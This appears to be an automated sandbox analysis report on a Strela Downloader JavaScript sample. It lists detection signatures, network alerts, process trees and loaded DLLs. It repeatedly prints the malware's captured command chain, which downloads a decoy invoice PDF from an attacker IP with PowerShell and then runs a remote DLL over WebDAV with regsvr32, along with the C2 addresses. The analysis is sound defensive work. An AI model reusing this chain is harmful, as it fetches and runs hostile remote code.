Windows Analysis Report
1647911459241874440.js

Overview

General Information

Sample name:	1647911459241874440.js
Analysis ID:	1592151
MD5:	0093191d26bb386eb24bcb6c56335bad
SHA1:	81f922b94bc687c709e28400825ca4b143ef601b
SHA256:	7453ba23481aacc86986f5009f0bb2a0f8d0b5d5a7848f0f70ce6c9338f4e011
Tags:	jsStrelaStealeruser-cocaman
Infos:

Detection

Strela Downloader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

JScript performs obfuscated calls to suspicious functions

Multi AV Scanner detection for submitted file

Sigma detected: Powershell launch regsvr32

Suricata IDS alerts for network traffic

Yara detected Strela Downloader

Downloads files with wrong headers with respect to MIME Content-Type

Gathers information about network shares

Sigma detected: Suspicious Invoke-WebRequest Execution

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Uses known network protocols on non-standard ports

Windows Scripting host checks user region and language preferences

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Communication To Uncommon Destination Ports

Sigma detected: Cscript/Wscript Potentially Suspicious Child Process

Sigma detected: Potential DLL File Download Via PowerShell Invoke-WebRequest

Sigma detected: PowerShell Script Run in AppData

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: 1647911459241874440.js

Virustotal: Detection: 12%

Perma Link

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.6:49711 -> 193.143.1.205:8888
Source: Network traffic	Suricata IDS: 2859560 - Severity 1 - ETPRO MALWARE StrelaStealer CnC Activity - Requesting Decoy Payload (GET) : 192.168.2.6:49709 -> 193.143.1.205:80

Downloads files with wrong headers with respect to MIME Content-Type

Source: http

Bad PDF prefix: HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Wed, 15 Jan 2025 19:42:02 GMT Content-Type: application/pdf Transfer-Encoding: chunked Connection: keep-alive X-Frame-Options: SAMEORIGIN Data Raw: 31 66 36 61 0d 0a 25 50 44 46 2d 31 2e 37 0a 25 bf f7 a2 fe 0a 31 20 30 20 6f 62 6a 0a 3c 3c 20 2f 50 61 67 65 73 20 33 20 30 20 52 20 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 20 3e 3e 0a 65 6e 64 6f 62 6a 0a 32 20 30 20 6f 62 6a 0a 3c 3c 20 2f 54 79 70 65 20 2f 4f 62 6a 53 74 6d 20 2f 4c 65 6e 67 74 68 20 35 36 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4e 20 31 20 2f 46 69 72 73 74 20 34 20 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 33 56 30 e0 b2 b1 51 d0 77 ce 2f cd 2b 51 30 54 d0 f7 ce 4c 29 56 88 56 30 51 30 50 08 52 88 55 d0 0f a9 2c 48 55 d0 0f 48 4c 4f 2d 56 b0 b3 e3 02 00 25 30 0c 6d 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 20 2f 43 6f 6e 74 65 6e 74 73 20 35 20 30 20 52 20 2f 47 72 6f 75 70 20 3c 3c 20 2f 43 53 20 2f 44 65 76 69 63 65 52 47 42 20 2f 49 20 74 72 75 65 20 2f 53 20 2f 54 72 61 6e 73 70 61 72 65 6e 63 79 20 2f 54 79 70 65 20 2f 47 72 6f 75 70 20 3e 3e 20 2f 4d 65 64 69 61 42 6f 78 20 5b 20 30 20 30 20 35 39 34 2e 39 36 20 38 34 30 2e 39 36 20 5d 20 2f 50 61 72 65 6e 74 20 33 20 30 20 52 20 2f 52 65 73 6f 75 72 63 65 73 20 36 20 30 20 52 20 2f 53 74 72 75 63 74 50 61 72 65 6e 74 73 20 30 20 2f 54 79 70 65 20 2f 50 61 67 65 20 3e 3e 0a 65 6e 64 6f 62 6a 0a 35 20 30 20 6f 62 6a 0a 3c 3c 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4c 65 6e 67 74 68 20 37 35 20 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 33 54 30 00 42 5d 43 20 61 61 62 a0 67 69 a6 90 9c cb 55 c8 65 a8 00 82 45 e9 0a fa 89 06 0a e9 c5 5c 20 45 a6 96 26 40 79 43 a8 3a a0 6c aa 42 1a 57 a0 42 21 50 39 44 95 82 7e 85 b9 82 4b 3e 57 20 10 02 00 26 99 12 f1 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62 6a 0a 36 20 30 20 6f 62 6a 0a 3c 3c 20 2f 45 78 74 47 53 74 61 74 65 20 3c 3c 20 2f 61 30 20 3c 3c 20 2f 43 41 20 31 20 2f 63 61 20 31 20 3e 3e 20 3e 3e 20 2f 58 4f 62 6a 65 63 74 20 3c 3c 20 2f 78 37 20 37 20 30 20 52 20 3e 3e 20 3e 3e 0a 65 6e 64 6f 62 6a 0a 37 20 30 20 6f 62 6a 0a 3c 3c 20 2f 42 42 6f 78 20 5b 20 30 20 30 20 35 39 35 20 38 34 31 20 5d 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 52 65 73 6f 75 72 63 65 73 20 38 20 30 20 52 20 2f 53 75 62 74 79 70 65 20 2f 46 6f 72 6d 20 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 20 2f 4c 65 6e 67 74 68 20 35 39 20 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 2b e4 0a 54 28 e4 d2 4f 2f 36 50 48 2f e6 2a e4 32 b5 34 d1 b3 34 53 30 00 42 5d 0b 13 03 08 1b ca 48 ce e5 d2 4f 04 a9 53 d0 af 30 34 54 70 c9 e7 0a 04 42 00 f1 ec 0e 9e 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62 6a 0a 38 20 30 20 6f 62 6a 0a 3c 3c 20 2f 45 78 74 47 53 74 61 74 65 20 3c 3c 20 2f 61 30 20 3c 3c 20 2f 43 41 20 31 20 2f 63 61 20 31 20 3e 3e 20 2f 67 73 30 20 3c 3c 20 2f 42 4d 20 2f 4e 6f 72 6d 61 6c 20 2f 43 41 20 31 2e 30 20 2f 53 4d 61 73 6b 20 2f 4e 6f 6e 65 20 2f 6

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49711

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.6:49711 -> 193.143.1.205:8888

Detected non-DNS traffic on DNS port

Source: global traffic

TCP traffic: 192.168.2.6:65212 -> 162.159.36.2:53

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 193.143.1.205 193.143.1.205

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: BITWEB-ASRU BITWEB-ASRU

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49709 -> 193.143.1.205:80

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /invoice.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 193.143.1.205Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.205

Source: global traffic

HTTP traffic detected: GET /invoice.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 193.143.1.205Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: x1.i.lencr.org

Source: wscript.exe, 00000000.00000003.2122742108.0000016183400000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.143.1.205/invoice.php
Source: net.exe, 00000007.00000002.2182594694.00000278DC2DF000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.2182390787.00000278DC288000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.2178967922.00000278DC2B7000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.2182466219.00000278DC2B7000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.2178827767.00000278DC2DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.143.1.205:8888/
Source: svchost.exe, 00000009.00000002.3409711759.0000024A41200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.9.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: 2D85F72862B55C4EADD9E66E06947F3D0.8.dr	String found in binary or memory: http://x1.i.lencr.org/
Source: qmgr.db.9.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000009.00000003.2189295888.0000024A41010000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:

Spam, unwanted Advertisements and Ransom Demands

Yara detected Strela Downloader

Source: Yara match

File source: Process Memory Space: wscript.exe PID: 4088, type: MEMORYSTR

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\32586295023593.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\32586295023593.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2356:120:WilError_03

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1647911459241874440.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\32586295023593.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1588,i,10440249036511766134,9373202045153823086,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\32586295023593.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1588,i,10440249036511766134,9373202045153823086,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
